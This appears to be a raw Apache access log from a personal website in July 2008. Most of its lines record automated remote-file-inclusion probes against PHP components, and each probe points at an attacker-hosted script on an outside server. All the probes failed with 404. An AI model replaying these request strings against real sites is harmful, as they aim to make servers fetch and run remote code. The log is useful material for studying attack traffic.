121.217.213.90 - - [31/Jul/2008:04:48:33 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
90.3.115.62 - - [31/Jul/2008:04:48:34 -0500] "GET //skin/zero_vote/index.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
121.217.213.90 - - [31/Jul/2008:04:48:45 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:48:45 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:48:45 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:48:49 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
70.84.182.98 - - [31/Jul/2008:04:49:16 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:04:49:16 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:04:50:03 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:04:50:03 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
90.3.115.62 - - [31/Jul/2008:04:52:52 -0500] "GET /logs//error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
90.3.115.62 - - [31/Jul/2008:04:52:52 -0500] "GET //error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.25.195.86 - - [31/Jul/2008:04:53:11 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.811"
209.25.195.86 - - [31/Jul/2008:04:53:11 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
200.11.67.242 - - [31/Jul/2008:04:54:01 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
200.11.67.242 - - [31/Jul/2008:04:54:01 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
92.56.99.197 - - [31/Jul/2008:04:54:17 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kke.com/id.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
92.56.99.197 - - [31/Jul/2008:04:54:17 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kke.com/id.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
89.255.60.6 - - [31/Jul/2008:04:55:17 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
89.255.60.6 - - [31/Jul/2008:04:55:17 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
74.53.89.162 - - [31/Jul/2008:04:55:38 -0500] "GET /logs/access_log.1212278400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
74.53.89.162 - - [31/Jul/2008:04:55:38 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
74.53.89.162 - - [31/Jul/2008:04:55:38 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
200.11.67.242 - - [31/Jul/2008:04:56:20 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
200.11.67.242 - - [31/Jul/2008:04:56:20 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
89.255.60.6 - - [31/Jul/2008:04:56:25 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
89.255.60.6 - - [31/Jul/2008:04:56:26 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
210.127.253.161 - - [31/Jul/2008:04:57:28 -0500] "GET /logs/access_log.1212883200///vwar/backup/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
213.180.137.71 - - [31/Jul/2008:05:01:22 -0500] "GET / HTTP/1.1" 200 1243 "-""holmes/3.12 (OnetSzukaj/5.0; +http://szukaj.onet.pl)"
75.0.18.81 - - [31/Jul/2008:05:02:02 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kke.com/id.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
75.0.18.81 - - [31/Jul/2008:05:02:02 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kke.com/id.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
90.3.115.62 - - [31/Jul/2008:05:03:38 -0500] "GET /logs//login.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
90.3.115.62 - - [31/Jul/2008:05:03:39 -0500] "GET //login.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
86.57.255.65 - - [31/Jul/2008:05:04:15 -0500] "GET /logs/access_log.1212278400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.playindian.com/m_pictures/id.txt???? HTTP/1.1" 404 370 "-""libwww-perl/5.79"
86.57.255.65 - - [31/Jul/2008:05:04:20 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.playindian.com/m_pictures/id.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
86.57.255.65 - - [31/Jul/2008:05:04:20 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.playindian.com/m_pictures/id.txt???? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
74.54.108.98 - - [31/Jul/2008:05:04:31 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:05:04:31 -0500] "GET //include/admin.lib.inc.php?site_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:05:04:52 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:05:04:52 -0500] "GET //include/admin.lib.inc.php?site_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.811"
209.234.171.33 - - [31/Jul/2008:05:05:31 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""ia_archiver"
209.234.171.33 - - [31/Jul/2008:05:05:33 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1810 "-""ia_archiver"
60.250.73.179 - - [31/Jul/2008:05:05:43 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
60.250.73.179 - - [31/Jul/2008:05:05:44 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
90.3.115.62 - - [31/Jul/2008:05:06:11 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
90.3.115.62 - - [31/Jul/2008:05:06:12 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
90.3.115.62 - - [31/Jul/2008:05:06:45 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
90.3.115.62 - - [31/Jul/2008:05:06:49 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
153.19.161.46 - - [31/Jul/2008:05:06:51 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:05:06:52 -0500] "GET //include/admin.lib.inc.php?site_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:05:06:56 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:05:06:57 -0500] "GET //include/admin.lib.inc.php?site_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
210.127.253.161 - - [31/Jul/2008:05:09:26 -0500] "GET /logs/access_log.1213315200///vwar/backup/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
216.246.46.184 - - [31/Jul/2008:05:09:54 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://213.238.52.61/coinsworld/werbung/id2.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
216.246.46.184 - - [31/Jul/2008:05:09:54 -0500] "GET //include/admin.lib.inc.php?site_path=http://213.238.52.61/coinsworld/werbung/id2.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
210.127.253.161 - - [31/Jul/2008:05:10:34 -0500] "GET /logs/access_log.1213142400///vwar/backup/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
70.84.182.98 - - [31/Jul/2008:05:12:23 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:05:12:24 -0500] "GET //include/admin.lib.inc.php?site_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:05:12:27 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:05:12:27 -0500] "GET //include/admin.lib.inc.php?site_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
67.18.151.242 - - [31/Jul/2008:05:12:32 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.proostjes.be/calendar/help01.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
67.18.151.242 - - [31/Jul/2008:05:12:32 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.proostjes.be/calendar/help01.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
74.53.89.162 - - [31/Jul/2008:05:13:24 -0500] "GET /logs/access_log.1209686400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
80.67.26.157 - - [31/Jul/2008:05:13:30 -0500] "GET /logs//errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:05:13:30 -0500] "GET //errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.808"
74.53.89.162 - - [31/Jul/2008:05:13:39 -0500] "GET /logs/access_log.1214870400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
74.53.89.162 - - [31/Jul/2008:05:13:55 -0500] "GET /logs/access_log.1214438400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 370 "-""libwww-perl/5.79"
74.53.89.162 - - [31/Jul/2008:05:13:55 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
74.53.89.162 - - [31/Jul/2008:05:13:55 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
195.93.201.102 - - [31/Jul/2008:05:14:34 -0500] "GET /logs//errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:05:14:34 -0500] "GET //errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
74.6.31.166 - - [31/Jul/2008:05:14:44 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
77.221.130.16 - - [31/Jul/2008:05:14:54 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://64.251.8.142/dark/safe.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
207.58.128.249 - - [31/Jul/2008:05:14:56 -0500] "GET /logs//jrBrowser/purchase.php?jamroom[jm_dir]=http://www.proostjes.be/calendar/help01.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
207.58.128.249 - - [31/Jul/2008:05:14:56 -0500] "GET //jrBrowser/purchase.php?jamroom[jm_dir]=http://www.proostjes.be/calendar/help01.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:05:15:17 -0500] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:05:15:17 -0500] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:05:15:21 -0500] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:05:15:21 -0500] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.54.108.98 - - [31/Jul/2008:05:15:36 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:05:15:36 -0500] "GET /lostpasswd.php?env[include_prefix]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:05:15:39 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:05:15:39 -0500] "GET /lostpasswd.php?env[include_prefix]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
90.3.115.62 - - [31/Jul/2008:05:16:21 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
90.3.115.62 - - [31/Jul/2008:05:16:22 -0500] "GET //skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
209.25.195.86 - - [31/Jul/2008:05:16:24 -0500] "GET /logs/access_log.1214438400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 370 "-""libwww-perl/5.811"
209.25.195.86 - - [31/Jul/2008:05:16:24 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
209.25.195.86 - - [31/Jul/2008:05:16:24 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.811"
195.93.201.102 - - [31/Jul/2008:05:16:26 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:05:16:26 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
153.19.161.46 - - [31/Jul/2008:05:16:34 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:05:16:34 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:05:16:34 -0500] "GET /lostpasswd.php?env[include_prefix]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:05:16:34 -0500] "GET /lostpasswd.php?env[include_prefix]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:05:17:04 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:05:17:04 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:05:17:05 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:05:17:05 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
92.56.99.197 - - [31/Jul/2008:05:18:06 -0500] "GET /logs/access_log.1214438400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kke.com/id.txt? HTTP/1.1" 404 370 "-""libwww-perl/5.79"
92.56.99.197 - - [31/Jul/2008:05:18:07 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kke.com/id.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
92.56.99.197 - - [31/Jul/2008:05:18:08 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kke.com/id.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
80.67.26.157 - - [31/Jul/2008:05:18:21 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:05:18:21 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
77.235.37.163 - - [31/Jul/2008:05:18:35 -0500] "GET /logs//header.php?base_folder=http://www.theimageguide.com/uploads/id2.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
77.235.37.163 - - [31/Jul/2008:05:18:35 -0500] "GET //header.php?base_folder=http://www.theimageguide.com/uploads/id2.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
62.75.240.22 - - [31/Jul/2008:05:18:59 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
62.75.240.22 - - [31/Jul/2008:05:18:59 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
74.54.108.98 - - [31/Jul/2008:05:19:04 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:05:19:04 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
60.250.73.179 - - [31/Jul/2008:05:19:14 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
60.250.73.179 - - [31/Jul/2008:05:19:15 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
94.136.160.61 - - [31/Jul/2008:05:19:20 -0500] "GET /logs//header.php?base_folder=http://www.theimageguide.com/uploads/arab.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
94.136.160.61 - - [31/Jul/2008:05:19:21 -0500] "GET //header.php?base_folder=http://www.theimageguide.com/uploads/arab.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
74.54.108.98 - - [31/Jul/2008:05:19:37 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:05:19:37 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
216.246.98.167 - - [31/Jul/2008:05:20:17 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.813"
216.246.98.167 - - [31/Jul/2008:05:20:18 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.813"
80.67.26.157 - - [31/Jul/2008:05:20:26 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:05:20:26 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
195.93.201.102 - - [31/Jul/2008:05:21:05 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:05:21:05 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
87.230.35.101 - - [31/Jul/2008:05:21:09 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www-iw.uni-r.de/mamboiw/components/com_registration/pw.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
87.230.35.101 - - [31/Jul/2008:05:21:09 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www-iw.uni-r.de/mamboiw/components/com_registration/pw.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
89.255.60.6 - - [31/Jul/2008:05:25:12 -0500] "GET /logs/access_log.1214438400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
89.255.60.6 - - [31/Jul/2008:05:25:13 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
89.255.60.6 - - [31/Jul/2008:05:25:13 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
75.0.18.81 - - [31/Jul/2008:05:25:21 -0500] "GET /logs/access_log.1214438400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kke.com/id.txt? HTTP/1.1" 404 370 "-""libwww-perl/5.805"
